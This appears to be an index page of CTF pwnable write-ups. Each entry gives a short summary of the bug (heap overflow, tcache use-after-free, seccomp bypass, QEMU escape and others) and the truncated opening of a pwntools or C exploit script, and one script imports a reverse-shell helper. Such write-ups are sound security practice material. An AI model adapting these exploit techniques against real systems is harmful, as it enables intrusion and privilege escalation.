Category : pwnable Summary : lua script, oob, integer overflow Exploit#!/usr/bin/python from pwn import * import sys s = process('./grunt') ru = s.recvuntil rl = s.recvline rr = s.recv rg = s.recvregex sl = s.sendline ss = s.send script = ''' -- Lukachu -- Hannobat -- Andyball -- Airmackly function trigger(obj) pokemon.swapAttack(obj, 0, 1) -- 1 2 pokemon.duplicateAttack(obj) -- 1 2 2 end local ..
2018/12
Category : pwnable Summary : bypass seccomp, close(0x8000000000000002), overwrite parent process memory Exploit#!/usr/bin/python from pwn import * s = process('./tea') ru = s.recvuntil rl = s.recvline rr = s.recv rg = s.recvregex sl = s.sendline ss = s.send def parse_maps(maps): res = {} get_base = lambda x : int(x.split('-')[0], 16) for line in maps.splitlines(): if 'r-x' in line and 'libc' in ..
Category : pwnable Summary : uninitialized variable Exploit#!/usr/bin/python from pwn import * def cmd_polish_sum(nums): ru('> ') sl(str(2)) ru('Operator: ') sl('S') for i in range(len(nums)): ru('Operand: ') sl(str(nums[i])) ru('Operand: ') sl('.') rl() def cmd_sign(num): ru('> ') sl(str(5)) sl(str(num)) def cmd_read_note(): ru('> ') sl(str(1)) ru('Your note: ') note = rl(False) return note s =..
Category : pwnable Summary : heap overflow Exploit#!/usr/bin/python from pwn import * def cmd_add(alloc_size, input_size, name, data): ru('Action') sl(str(0)) ru('size of description: ') sl(str(alloc_size)) ru('name: ') sl(name) ru('text length: ') sl(str(input_size)) ru('text: ') sl(data) def cmd_del(idx): ru('Action') sl(str(1)) ru('index: ') sl(str(idx)) def cmd_show(idx): ru('Action') sl(str..
Category : pwnable Summary : wasm, bof, trigger function table index oob Exploit #!/usr/bin/python from pwn import * from paul45 import reverse_shell import requests as r URL = 'http://0:23333' def add_person(name, is_tutor): res = r.get(URL + '/add_person', params={'name':name, 'is_tutor':is_tutor}).text idx = int(res[len('create person done, person id = '..
Category : pwnable CLV24893 SolvesPwn me, and Prove yourself nc clv2.pwn.seccon.jp 31337 Summary : tcache, use after free Exploit#!/usr/bin/python from pwn import * def cmd_register(name): ru('[E]xit\n') sl('R') ru('name?\n') sl(name) return rl(False).split(' ')[0] def cmd_login(name): ru('[E]xit\n') sl('L') ru('User : ') sl(name) def cmd_play(): ru('[E]xit\n') sl('P') def cmd_add_prov(method, w..
Category : pwnable Summary : qemu escape Exploit#include #include #include #include #include #include #include #include #include #define OOO_ALLOCATE 0x000000 #define OOO_FREE 0x100000 #define OOO_WRITE 0x200000 #define MAP_SIZE 0x1000000 #define OOO_BIN_BASE 0x1317940 #define FREE_GOT 0x11301a0 #define OOO_MAGIC_GADGET 0x6e65f9 int fd; char *mmio; uint64_t ooo_read(uint32_t idx, uint32_t offset..
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define IOMEM_A 0xfe900000 #define IOMEM_B 0xfea00000 #define IOPORT_A 0xc000 #define IOPORT_B 0xc100 #define MMIO_SRC 0x04 #define MMIO_DST 0x08 #define MMIO_COPY 0x20 #define MMIO_CMD 0x24 #define MMIO_TIMER 0x80 #define MMIO_EXPIRE_LO 0x88 #define MMIO_EXP..
